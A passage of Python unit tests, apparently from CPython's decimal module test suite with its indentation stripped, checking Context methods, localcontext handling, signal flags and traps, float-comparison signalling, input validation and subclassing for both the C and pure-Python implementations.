self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_value(Decimal(10))
self.assertEqual(c.to_integral_value(10), d)
self.assertRaises(TypeError, c.to_integral_value, '10')
self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
class CContextAPItests(ContextAPItests):
decimal = C
class PyContextAPItests(ContextAPItests):
decimal = P
class ContextWithStatement(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_nested_with_statements(self):
# Use a copy of the supplied context in the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
with localcontext() as c1:
self.assertEqual(c1.flags, orig_ctx.flags)
self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = True
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertTrue(c1.flags[Clamped])
with localcontext(new_ctx) as c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertFalse(c2.flags[Clamped])
self.assertTrue(c2.flags[Overflow])
del c2
self.assertFalse(c1.flags[Overflow])
del c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertFalse(orig_ctx.flags[Clamped])
self.assertFalse(orig_ctx.flags[Overflow])
self.assertFalse(new_ctx.flags[Clamped])
self.assertFalse(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
del c1
with localcontext() as c2:
del c2
with localcontext() as c3:
del c3
with localcontext() as c4:
del c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
with localcontext(c1) as c2:
del c1
with localcontext(c2) as c3:
del c2
with localcontext(c3) as c4:
del c3
del c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
with localcontext() as c1:
del c1
n1 = Context(prec=1)
setcontext(n1)
with localcontext(n1) as c2:
del n1
self.assertEqual(c2.prec, 1)
del c2
n2 = Context(prec=2)
setcontext(n2)
del n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
with localcontext(n3) as c3:
del n3
self.assertEqual(c3.prec, 3)
del c3
n4 = Context(prec=4)
setcontext(n4)
del n4
self.assertEqual(getcontext().prec, 4)
with localcontext() as c4:
self.assertEqual(c4.prec, 4)
del c4
class CContextWithStatement(ContextWithStatement):
decimal = C
class PyContextWithStatement(ContextWithStatement):
decimal = P
class ContextFlags(unittest.TestCase):
def test_flags_irrelevant(self):
# check that the result (numeric result + flags raised) of an
# arithmetic operation doesn't depend on the current flags
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
Subnormal = self.decimal.Subnormal
def raise_error(context, flag):
if self.decimal == C:
context.flags[flag] = True
if context.traps[flag]:
raise flag
else:
context._raise_error(flag)
context = Context(prec=9, Emin = -425000000, Emax = 425000000,
rounding=ROUND_HALF_EVEN, traps=[], flags=[])
# operations that raise various flags, in the form (function, arglist)
operations = [
(context._apply, [Decimal("100E-425000010")]),
(context.sqrt, [Decimal(2)]),
(context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
]
# try various flags individually, then a whole lot at once
flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
[Inexact, Rounded, Underflow, Clamped, Subnormal]]
for fn, args in operations:
# find answer and flags raised using a clean context
context.clear_flags()
ans = fn(*args)
flags = [k for k, v in context.flags.items() if v]
for extra_flags in flagsets:
# set flags, before calling operation
context.clear_flags()
for flag in extra_flags:
raise_error(context, flag)
new_ans = fn(*args)
# flags that we expect to be set after the operation
expected_flags = list(flags)
for flag in extra_flags:
if flag not in expected_flags:
expected_flags.append(flag)
expected_flags.sort(key=id)
# flags we actually got
new_flags = [k for k,v in context.flags.items() if v]
new_flags.sort(key=id)
self.assertEqual(ans, new_ans,
"operation produces different answers depending on flags set: " +
"expected %s, got %s." % (ans, new_ans))
self.assertEqual(new_flags, expected_flags,
"operation raises different flags depending on flags set: " +
"expected %s, got %s" % (expected_flags, new_flags))
def test_flag_comparisons(self):
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
c = Context()
# Valid SignalDict
self.assertNotEqual(c.flags, c.traps)
self.assertNotEqual(c.traps, c.flags)
c.flags = c.traps
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
c.flags[Rounded] = True
c.traps = c.flags
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
d = {}
d.update(c.flags)
self.assertEqual(d, c.flags)
self.assertEqual(c.flags, d)
d[Inexact] = True
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
# Invalid SignalDict
d = {Inexact:False}
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
d = ["xyz"]
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
@requires_IEEE_754
def test_float_operation(self):
Decimal = self.decimal.Decimal
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
with localcontext() as c:
##### trap is off by default
self.assertFalse(c.traps[FloatOperation])
# implicit conversion sets the flag
c.clear_flags()
self.assertEqual(Decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertEqual(c.create_decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion does not set the flag
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
# comparison sets the flag
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
##### set the trap
c.traps[FloatOperation] = True
# implicit conversion raises
c.clear_flags()
self.assertRaises(FloatOperation, Decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertRaises(FloatOperation, c.create_decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion is silent
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
def test_float_comparison(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
def assert_attr(a, b, attr, context, signal=None):
context.clear_flags()
f = getattr(a, attr)
if signal == FloatOperation:
self.assertRaises(signal, f, b)
else:
self.assertIs(f(b), True)
self.assertTrue(context.flags[FloatOperation])
small_d = Decimal('0.25')
big_d = Decimal('3.0')
small_f = 0.25
big_f = 3.0
zero_d = Decimal('0.0')
neg_zero_d = Decimal('-0.0')
zero_f = 0.0
neg_zero_f = -0.0
inf_d = Decimal('Infinity')
neg_inf_d = Decimal('-Infinity')
inf_f = float('inf')
neg_inf_f = float('-inf')
def doit(c, signal=None):
# Order
for attr in '__lt__', '__le__':
assert_attr(small_d, big_f, attr, c, signal)
for attr in '__gt__', '__ge__':
assert_attr(big_d, small_f, attr, c, signal)
# Equality
assert_attr(small_d, small_f, '__eq__', c, None)
assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(neg_zero_d, zero_f, '__eq__', c, None)
assert_attr(zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(zero_d, zero_f, '__eq__', c, None)
assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None)
assert_attr(inf_d, inf_f, '__eq__', c, None)
# Inequality
assert_attr(small_d, big_f, '__ne__', c, None)
assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None)
assert_attr(neg_inf_d, inf_f, '__ne__', c, None)
assert_attr(inf_d, neg_inf_f, '__ne__', c, None)
assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None)
def test_containers(c, signal=None):
c.clear_flags()
s = set([100.0, Decimal('100.0')])
self.assertEqual(len(s), 1)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
if signal:
self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
else:
s = sorted([10.0, Decimal('10.0')])
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in [Decimal('10.0'), 1.0]
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'}
self.assertTrue(c.flags[FloatOperation])
nc = Context()
with localcontext(nc) as c:
self.assertFalse(c.traps[FloatOperation])
doit(c, signal=None)
test_containers(c, signal=None)
c.traps[FloatOperation] = True
doit(c, signal=FloatOperation)
test_containers(c, signal=FloatOperation)
def test_float_operation_default(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
FloatOperation= self.decimal.FloatOperation
context = Context()
self.assertFalse(context.flags[FloatOperation])
self.assertFalse(context.traps[FloatOperation])
context.clear_traps()
context.traps[Inexact] = True
context.traps[FloatOperation] = True
self.assertTrue(context.traps[FloatOperation])
self.assertTrue(context.traps[Inexact])
class CContextFlags(ContextFlags):
decimal = C
class PyContextFlags(ContextFlags):
decimal = P
class SpecialContexts(unittest.TestCase):
"""Test the context templates."""
def test_context_templates(self):
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
assert_signals(self, BasicContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
)
savecontext = getcontext().copy()
basic_context_prec = BasicContext.prec
extended_context_prec = ExtendedContext.prec
ex = None
try:
BasicContext.prec = ExtendedContext.prec = 441
for template in BasicContext, ExtendedContext:
setcontext(template)
c = getcontext()
self.assertIsNot(c, template)
self.assertEqual(c.prec, 441)
except Exception as e:
ex = e.__class__
finally:
BasicContext.prec = basic_context_prec
ExtendedContext.prec = extended_context_prec
setcontext(savecontext)
if ex:
raise ex
def test_default_context(self):
DefaultContext = self.decimal.DefaultContext
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
self.assertEqual(BasicContext.prec, 9)
self.assertEqual(ExtendedContext.prec, 9)
assert_signals(self, DefaultContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow]
)
savecontext = getcontext().copy()
default_context_prec = DefaultContext.prec
ex = None
try:
c = getcontext()
saveprec = c.prec
DefaultContext.prec = 961
c = getcontext()
self.assertEqual(c.prec, saveprec)
setcontext(DefaultContext)
c = getcontext()
self.assertIsNot(c, DefaultContext)
self.assertEqual(c.prec, 961)
except Exception as e:
ex = e.__class__
finally:
DefaultContext.prec = default_context_prec
setcontext(savecontext)
if ex:
raise ex
class CSpecialContexts(SpecialContexts):
decimal = C
class PySpecialContexts(SpecialContexts):
decimal = P
class ContextInputValidation(unittest.TestCase):
def test_invalid_context(self):
Context = self.decimal.Context
DefaultContext = self.decimal.DefaultContext
c = DefaultContext.copy()
# prec, Emax
for attr in ['prec', 'Emax']:
setattr(c, attr, 999999)
self.assertEqual(getattr(c, attr), 999999)
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(TypeError, setattr, c, attr, 'xyz')
# Emin
setattr(c, 'Emin', -999999)
self.assertEqual(getattr(c, 'Emin'), -999999)
self.assertRaises(ValueError, setattr, c, 'Emin', 1)
self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))
self.assertRaises(TypeError, setattr, c, 'rounding', -1)
self.assertRaises(TypeError, setattr, c, 'rounding', 9)
self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
# Invalid attribute
self.assertRaises(AttributeError, setattr, c, 'emax', 100)
# Invalid signal dict
self.assertRaises(TypeError, setattr, c, 'flags', [])
self.assertRaises(KeyError, setattr, c, 'flags', {})
self.assertRaises(KeyError, setattr, c, 'traps',
{'InvalidOperation':0})
# Attributes cannot be deleted
for attr in ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
'flags', 'traps']:
self.assertRaises(AttributeError, c.__delattr__, attr)
# Invalid attributes
self.assertRaises(TypeError, getattr, c, 9)
self.assertRaises(TypeError, setattr, c, 9)
# Invalid values in constructor
self.assertRaises(TypeError, Context, rounding=999999)
self.assertRaises(TypeError, Context, rounding='xyz')
self.assertRaises(ValueError, Context, clamp=2)
self.assertRaises(ValueError, Context, capitals=-1)
self.assertRaises(KeyError, Context, flags=["P"])
self.assertRaises(KeyError, Context, traps=["Q"])
# Type error in conversion
self.assertRaises(TypeError, Context, flags=(0,1))
self.assertRaises(TypeError, Context, traps=(1,0))
class CContextInputValidation(ContextInputValidation):
decimal = C
class PyContextInputValidation(ContextInputValidation):
decimal = P
class ContextSubclassing(unittest.TestCase):
def test_context_subclassing(self):
decimal = self.decimal
Decimal = decimal.Decimal
Context = decimal.Context
Clamped = decimal.Clamped
DivisionByZero = decimal.DivisionByZero
Inexact = decimal.Inexact
Overflow = decimal.Overflow
Rounded = decimal.Rounded
Subnormal = decimal.Subnormal
Underflow = decimal.Underflow
InvalidOperation = decimal.InvalidOperation
class MyContext(Context):
def __init__(self, prec=None, rounding=None, Emin=None, Emax=None,
capitals=None, clamp=None, flags=None,
traps=None):
Context.__init__(self)
if prec is not None:
self.prec = prec
if rounding is not None:
self.rounding = rounding
if Emin is not None:
self.Emin = Emin
if Emax is not None:
self.Emax = Emax
if capitals is not None:
self.capitals = capitals
if clamp is not None:
self.clamp = clamp
if flags is not None:
if isinstance(flags, list):
flags = {v:(v in flags) for v in OrderedSignals[decimal] + flags}
self.flags = flags
if traps is not None:
if isinstance(traps, list):
traps = {v:(v in traps) for v in OrderedSignals[decimal] + traps}
self.traps = traps
c = Context()
d = MyContext()
for attr in ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
'flags', 'traps'):
self.assertEqual(getattr(c, attr), getattr(d, attr))
# prec
self.assertRaises(ValueError, MyContext, **{'prec':-1})
c = MyContext(prec=1)
self.assertEqual(c.prec, 1)
self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)
# rounding
self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
c = MyContext(rounding=ROUND_DOWN, prec=1)
self.assertEqual(c.rounding, ROUND_DOWN)
self.assertEqual(c.plus(Decimal('9.9')), 9)
# Emin
self.assertRaises(ValueError, MyContext, **{'Emin':5})
c = MyContext(Emin=-1, prec=1)
self.assertEqual(c.Emin, -1)
x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
self.assertEqual(x, Decimal('0.0'))
for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
self.assertTrue(c.flags[signal])
# Emax
self.assertRaises(ValueError, MyContext, **{'Emax':-1})
c = MyContext(Emax=1, prec=1)
self.assertEqual(c.Emax, 1)
self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
if self.decimal == C:
for signal in (Inexact, Overflow, Rounded):
self.assertTrue(c.flags[signal])
# capitals
self.assertRaises(ValueError, MyContext, **{'capitals':-1})
c = MyContext(capitals=0)
self.assertEqual(c.capitals, 0)
x = c.create_decimal('1E222')
self.assertEqual(c.to_sci_string(x), '1e+222')
# clamp
self.assertRaises(ValueError, MyContext, **{'clamp':2})
c = MyContext(clamp=1, Emax=99)
self.assertEqual(c.clamp, 1)
x = c.plus(Decimal('1e99'))
self.assertEqual(str(x), '1.000000000000000000000000000E+99')
# flags
self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
c = MyContext(flags=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.flags[signal])
c.clear_flags()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.flags[signal])
# traps
self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
c = MyContext(traps=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.traps[signal])
c.clear_traps()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.traps[signal])
class CContextSubclassing(ContextSubclassing):
decimal = C
class PyContextSubclassing(ContextSubclassing):
decimal = P
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
def test_module_attributes(self):
# Architecture dependent context limits
self.assertEqual(C.MAX_PREC, P.MAX_PREC)
self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)
self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)
self.assertEqual(C.__version__, P.__version__)
self.assertEqual(dir(C), dir(P))
def test_context_attributes(self):
x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
def test_decimal_attributes(self):
x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
y = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
class Coverage(unittest.TestCase):
def test_adjusted(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
# XXX raise?
self.assertEqual(Decimal('nan').adjusted(), 0)
self.assertEqual(Decimal('inf').adjusted(), 0)
def test_canonical(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
x = Decimal(9).canonical()
self.assertEqual(x, 9)
c = getcontext()
x = c.canonical(Decimal(9))
self.assertEqual(x, 9)
def test_context_repr(self):
c = self.decimal.DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[self.decimal]:
c.flags[sig] = False
c.traps[sig] = False
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[], traps=[])"
self.assertEqual(s, t)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
# abs
self.assertEqual(abs(Decimal("-10")), 10)
# add
self.assertEqual(Decimal("7") + 1, 8)
# divide
self.assertEqual(Decimal("10") / 5, 2)
# divide_int
self.assertEqual(Decimal("10") // 7, 1)
# fma
self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
# three arg power
self.assertEqual(pow(Decimal(10), 2, 7), 2)
# exp
self.assertEqual(Decimal("1.01").exp(), 3)
# is_normal
self.assertIs(Decimal("0.01").is_normal(), False)
# is_subnormal
self.assertIs(Decimal("0.01").is_subnormal(), True)
# ln
self.assertEqual(Decimal("20").ln(), 3)
# log10
self.assertEqual(Decimal("20").log10(), 1)
# logb
self.assertEqual(Decimal("580").logb(), 2)
# logical_invert
self.assertEqual(Decimal("10").logical_invert(), 1)
# minus
self.assertEqual(-Decimal("-10"), 10)
# multiply
self.assertEqual(Decimal("2") * 4, 8)
# next_minus
self.assertEqual(Decimal("10").next_minus(), 9)
# next_plus
self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
# normalize
self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
# number_class
self.assertEqual(Decimal("10").number_class(), '+Normal')
# plus
self.assertEqual(+Decimal("-1"), -1)
# remainder
self.assertEqual(Decimal("10") % 7, 3)
# subtract
self.assertEqual(Decimal("10") - 7, 3)
# to_integral_exact
self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
# Boolean functions
self.assertTrue(Decimal("1").is_canonical())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("snan").is_snan())
self.assertTrue(Decimal("-1").is_signed())
self.assertTrue(Decimal("0").is_zero())
self.assertTrue(Decimal("0").is_zero())
# Copy
with localcontext() as c:
c.prec = 10000
x = 1228 ** 1523
y = -Decimal(x)
z = y.copy_abs()
self.assertEqual(z, x)
z = y.copy_negate()
self.assertEqual(z, x)
z = y.copy_sign(Decimal(1))
self.assertEqual(z, x)
def test_divmod(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
with localcontext() as c:
q, r = divmod(Decimal("10912837129"), 1001)
self.assertEqual(q, Decimal('10901935'))
self.assertEqual(r, Decimal('194'))
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
c.clear_flags()
q, r = divmod(Decimal("inf"), Decimal("inf"))
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal("inf"), 101)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal(0), 0)
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.traps[DivisionByZero] = False
c.clear_flags()
q, r = divmod(Decimal(11), 0)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation] and
c.flags[DivisionByZero])
def test_power(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
Overflow = self.decimal.Overflow
Rounded = self.decimal.Rounded
with localcontext() as c:
c.prec = 3
c.clear_flags()
self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
self.assertTrue(c.flags[Rounded])
c.prec = 1
c.Emax = 1
c.Emin = -1
c.clear_flags()
c.traps[Overflow] = False
self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
self.assertTrue(c.flags[Overflow])
def test_quantize(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
c.traps[InvalidOperation] = False
x = Decimal(99).quantize(Decimal("1e1"))
self.assertTrue(x.is_nan())
def test_radix(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
self.assertEqual(Decimal("1").radix(), 10)
self.assertEqual(c.radix(), 10)
def test_rop(self):
Decimal = self.decimal.Decimal
for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
def test_round(self):
# Python3 behavior: round() returns Decimal
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 28
self.assertEqual(str(Decimal("9.99").__round__()), "10")
self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
def test_create_decimal(self):
c = self.decimal.Context()
self.assertRaises(ValueError, c.create_decimal, ["%"])
def test_int(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 9999
x = Decimal(1221**1271) / 10**3923
self.assertEqual(int(x), 1)
